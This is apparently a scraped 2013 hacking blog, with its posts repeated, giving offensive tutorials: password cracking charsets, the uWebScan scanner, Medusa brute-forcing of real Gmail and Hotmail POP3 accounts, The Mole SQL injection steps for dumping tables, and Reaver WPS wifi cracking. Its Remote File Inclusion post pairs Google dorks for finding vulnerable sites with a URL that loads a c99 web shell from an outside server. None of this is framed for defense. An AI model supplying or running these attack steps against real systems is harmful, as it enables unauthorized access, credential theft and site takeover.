Min lenght of password = 4
Max lenght of password = 7
Charset = ?l?u?d?s -> abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Hash = hash.txt <- File
?l?1?1?1?1?1?d -> first character is in ?l (abcde...) and the last character is in ?d (0123...)
If you have any problem or if you need some explanations just write under this post!
Monday, January 21, 2013
uWebScan - Web application vulneraility scanner
uWebScan is a small modular web scanner written in python.
This is not meant as a replacement to Nikto or similar scanners.
List of modules : (S=SAFE N=NOT SAFE)
-[S] apacheversion: Apache HTTPD Version Detection
-[S] bigipcookie : F5 BIGIP Cookie IP Exposure
-[S] httpheaders : HTTP Headers Available
-[S] httpoptions : HTTP OPTIONS Available
-[S] httptracevuln: HTTP TRACE Vulnerability
-[S] intipvuln : Internal IP Vulnerability
-[S] ntlmvuln : NTLM Authentication Vulnerability
-[S] propfindvuln : PROPFIND (WebDAV) Vulnerability
-[S] robotstxtvuln: Robots.txt "Disallow" Disclosure
-[N] webr00t : File & Directory Enumeration
-[S] webtime : Web Server Clock Check
You can download uWebScan from here
uWebScan need python < python3.0
syntax : ./uWebScan.py -h host -m module
m default = all module
-o : output file
-p : port
-s : use ssl
-l : list of modules
-n : disable safe mode (default : enable safe mode)
Example :
./uWebScan.py -h www.site.com -m -s -o /home/HackForLulz/result
Host = site.com
Module = All (except NOT SAFE modules)
ssl = Enabled
Output file = /home/HackForLulz/result
./uWebScan.py -h www.site.com -m apacheversion bigipcookie httpheaders -s
Host = site.com
Module = apacheversione, bigipcookie, httpheaders
ssl = Enabled
./uWebScan.py -h www.site.com -m -n
Host = site.com
Module = All (SAFE AND NOT SAFE)
ssl = Disabled
For more informations type : ./uWebScan -h
If you have any problem or if you need some explanations just write under this post!
This is not meant as a replacement to Nikto or similar scanners.
List of modules : (S=SAFE N=NOT SAFE)
-[S] apacheversion: Apache HTTPD Version Detection
-[S] bigipcookie : F5 BIGIP Cookie IP Exposure
-[S] httpheaders : HTTP Headers Available
-[S] httpoptions : HTTP OPTIONS Available
-[S] httptracevuln: HTTP TRACE Vulnerability
-[S] intipvuln : Internal IP Vulnerability
-[S] ntlmvuln : NTLM Authentication Vulnerability
-[S] propfindvuln : PROPFIND (WebDAV) Vulnerability
-[S] robotstxtvuln: Robots.txt "Disallow" Disclosure
-[N] webr00t : File & Directory Enumeration
-[S] webtime : Web Server Clock Check
You can download uWebScan from here
uWebScan need python < python3.0
syntax : ./uWebScan.py -h host -m module
m default = all module
-o : output file
-p : port
-s : use ssl
-l : list of modules
-n : disable safe mode (default : enable safe mode)
Example :
./uWebScan.py -h www.site.com -m -s -o /home/HackForLulz/result
Host = site.com
Module = All (except NOT SAFE modules)
ssl = Enabled
Output file = /home/HackForLulz/result
./uWebScan.py -h www.site.com -m apacheversion bigipcookie httpheaders -s
Host = site.com
Module = apacheversione, bigipcookie, httpheaders
ssl = Enabled
./uWebScan.py -h www.site.com -m -n
Host = site.com
Module = All (SAFE AND NOT SAFE)
ssl = Disabled
For more informations type : ./uWebScan -h
If you have any problem or if you need some explanations just write under this post!
Saturday, January 19, 2013
Medusa - bruteforce
Medusa is an open source software for bruteforce.
Medusa support a lot of modules:
-AFP
-CVS
-FTP
-HTTP
-IMAP
-MS-SQL
-MySQL
-NCP (NetWare)
-NNTP
-PcAnywhere
-POP3
-PostgreSQL
-rexec
-rlogin
-rsh
-SMB
-SMTP (AUTH/VRFY)
-SNMP
-SSHv2
-SVN
-Telnet
-VmAuthd
-VNC
-Web-form
-Wrapper
sudo apt-get install linux-headers-$(uname -r) build-essential make patch subversion libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libgcrypt11-dev libgnutls-dev libsvn-dev
sudo apt-get install medusa
Archlinux : Download tarball from here
tar -zxvf medusa.tar.gz
cd medusa
makepkg -csi
Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] -M module [OPT]
-h : Target hostname or IP address
-H : File with target hostnames or IP addresses
-u : username to test
-U : File with usernames to test
-p : Password to test
-P : File with passwords to test
-M : Name of the module to execute
Most important [OPT]:
-O : File to append log information to
-d : Dump all known modules
-n : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
Example :
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3
Host = pop.gmail.com
Username = hackforlulz@gmail.com
Passwords = File /home/HackForLulz/wordlist
ssl = enabled
Module = POP3
medusa -h pop3.live.com -U /home/HackForLulz/user -P /home/HackForLulz/wordlist -n 995 -M POP3
Host = pop3.live.com
Username = /home/HackForLulz/user <- file
Passwords = File /home/HackForLulz/wordlist
Port = 995
Module = POP3
Most popular server of email are :
GMAIL - pop.gmail.com - smtp.gmail.com (ssl)
LIBERO ADSL - popmail.libero.it – imapmail.iol.it - mail.libero.it
MSN HOTMAIL - pop3.live.com (port 995) smtp.live.com (port 25)
ALICE ADSL - in.alice.it out.alice.it
TIM.IT - mail.posta.tim.it – box.posta.tim.it box.posta.tim.it
ROSSOALICE - in.aliceposta.it – box.tin.it out.aliceposta.it – mail.tin.it
TIN.IT - pop.tin.it – box.tin.it (aliceadsl) – box.clubnet.tin.it – box2.tin.it
VIRGILIO - in.virgilio.it – popmail.virgilio.it out.virgilio.it – smtp.virgilio.it
TISCALI.IT - pop.tiscali.it smtp.tiscali.
ALICEPOSTA.IT - in.alice.it
KATAWEB.IT - mail.katamail.com – pop.katamail.com smtp.katamail.com
LYCOS - pop.lycos.it – pop3.lycos.it smtp.lycos.it
MSN.COM - smtp.email.msn.com pop3.email.msn.com
SUPEREVA.IT - mail.supereva.it mail.supereva.it
VODAFONE MAIL - popmail.vodafone.it - smtp.net.vodafone.it
YAHOO.COM - pop.mail.yahoo.com smtp.mail.yahoo.com
ARUBA.IT - pop3.aruba.it smtp.aruba.it
For more information type in terminal : medusa
If you have any problem or if you need some explanations just write under this post!
Medusa support a lot of modules:
-AFP
-CVS
-FTP
-HTTP
-IMAP
-MS-SQL
-MySQL
-NCP (NetWare)
-NNTP
-PcAnywhere
-POP3
-PostgreSQL
-rexec
-rlogin
-rsh
-SMB
-SMTP (AUTH/VRFY)
-SNMP
-SSHv2
-SVN
-Telnet
-VmAuthd
-VNC
-Web-form
-Wrapper
Install
Ubuntu :sudo apt-get install linux-headers-$(uname -r) build-essential make patch subversion libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libgcrypt11-dev libgnutls-dev libsvn-dev
sudo apt-get install medusa
Archlinux : Download tarball from here
tar -zxvf medusa.tar.gz
cd medusa
makepkg -csi
Start
Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] -M module [OPT]
-h : Target hostname or IP address
-H : File with target hostnames or IP addresses
-u : username to test
-U : File with usernames to test
-p : Password to test
-P : File with passwords to test
-M : Name of the module to execute
Most important [OPT]:
-O : File to append log information to
-d : Dump all known modules
-n : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
Example :
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3
Host = pop.gmail.com
Username = hackforlulz@gmail.com
Passwords = File /home/HackForLulz/wordlist
ssl = enabled
Module = POP3
medusa -h pop3.live.com -U /home/HackForLulz/user -P /home/HackForLulz/wordlist -n 995 -M POP3
Host = pop3.live.com
Username = /home/HackForLulz/user <- file
Passwords = File /home/HackForLulz/wordlist
Port = 995
Module = POP3
Most popular server of email are :
GMAIL - pop.gmail.com - smtp.gmail.com (ssl)
LIBERO ADSL - popmail.libero.it – imapmail.iol.it - mail.libero.it
MSN HOTMAIL - pop3.live.com (port 995) smtp.live.com (port 25)
ALICE ADSL - in.alice.it out.alice.it
TIM.IT - mail.posta.tim.it – box.posta.tim.it box.posta.tim.it
ROSSOALICE - in.aliceposta.it – box.tin.it out.aliceposta.it – mail.tin.it
TIN.IT - pop.tin.it – box.tin.it (aliceadsl) – box.clubnet.tin.it – box2.tin.it
VIRGILIO - in.virgilio.it – popmail.virgilio.it out.virgilio.it – smtp.virgilio.it
TISCALI.IT - pop.tiscali.it smtp.tiscali.
ALICEPOSTA.IT - in.alice.it
KATAWEB.IT - mail.katamail.com – pop.katamail.com smtp.katamail.com
LYCOS - pop.lycos.it – pop3.lycos.it smtp.lycos.it
MSN.COM - smtp.email.msn.com pop3.email.msn.com
SUPEREVA.IT - mail.supereva.it mail.supereva.it
VODAFONE MAIL - popmail.vodafone.it - smtp.net.vodafone.it
YAHOO.COM - pop.mail.yahoo.com smtp.mail.yahoo.com
ARUBA.IT - pop3.aruba.it smtp.aruba.it
For more information type in terminal : medusa
If you have any problem or if you need some explanations just write under this post!
Thursday, January 17, 2013
Themole - Sqlinjection
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features
-Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
-Command line interface. Different commands trigger different actions.
-Auto-completion for commands, command arguments and database, table and columns names.
-Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
-Exploits SQL Injections through GET/POST/Cookie parameters.
-Developed in python 3.
-Exploits SQL Injections that return binary data.
-Powerful command interpreter to simplify its usage.
First of all download themole from official website here
Now we need python 3 and lxml library.
Now for run move into directory themole (cd..) and type : ./mole.py
Now type:
1) url www.website.com/index.php?pag=1
2) needle pag (pag is the parameter vulnerable in url)
3) schemas
4) tables dbname
5) columns dbname tablename
6) query dbname tablename column1,column2,column3...
For more information click here
If you have a problem or you need some explanations just write under this post!
Features
-Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
-Command line interface. Different commands trigger different actions.
-Auto-completion for commands, command arguments and database, table and columns names.
-Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
-Exploits SQL Injections through GET/POST/Cookie parameters.
-Developed in python 3.
-Exploits SQL Injections that return binary data.
-Powerful command interpreter to simplify its usage.
First of all download themole from official website here
Now we need python 3 and lxml library.
Now for run move into directory themole (cd..) and type : ./mole.py
Now type:
1) url www.website.com/index.php?pag=1
2) needle pag (pag is the parameter vulnerable in url)
3) schemas
4) tables dbname
5) columns dbname tablename
6) query dbname tablename column1,column2,column3...
For more information click here
If you have a problem or you need some explanations just write under this post!
Saturday, January 12, 2013
Remote File Inclusion
RFI (Remote File Inclusion) is a type of vulnerability on websites.
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is a old vulnerability, so vulnerable sites are very few.
So, how find a vulnerable site ?
We can use Google Dork, for more info about google dork click here
What kind of dork we can use ?
I reccomend dork like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99 we've root access on site.
If you have a problem or you need some explanations just write under this post!
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is a old vulnerability, so vulnerable sites are very few.
So, how find a vulnerable site ?
We can use Google Dork, for more info about google dork click here
What kind of dork we can use ?
I reccomend dork like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99 we've root access on site.
If you have a problem or you need some explanations just write under this post!
Friday, January 4, 2013
Reaver - Crack Wifi
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
You can download reaver from here
For crack a wifi we type:
reaver -i monitor mode enable on -b bssid -vv
For more info about monitor mode and how to find bssid click here
For more information about reaver type :
reaver -h
If you have a problem or you need some explanations just write under this post!
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
You can download reaver from here
For crack a wifi we type:
reaver -i monitor mode enable on -b bssid -vv
For more info about monitor mode and how to find bssid click here
For more information about reaver type :
reaver -h
If you have a problem or you need some explanations just write under this post!
Subscribe to:
Posts (Atom)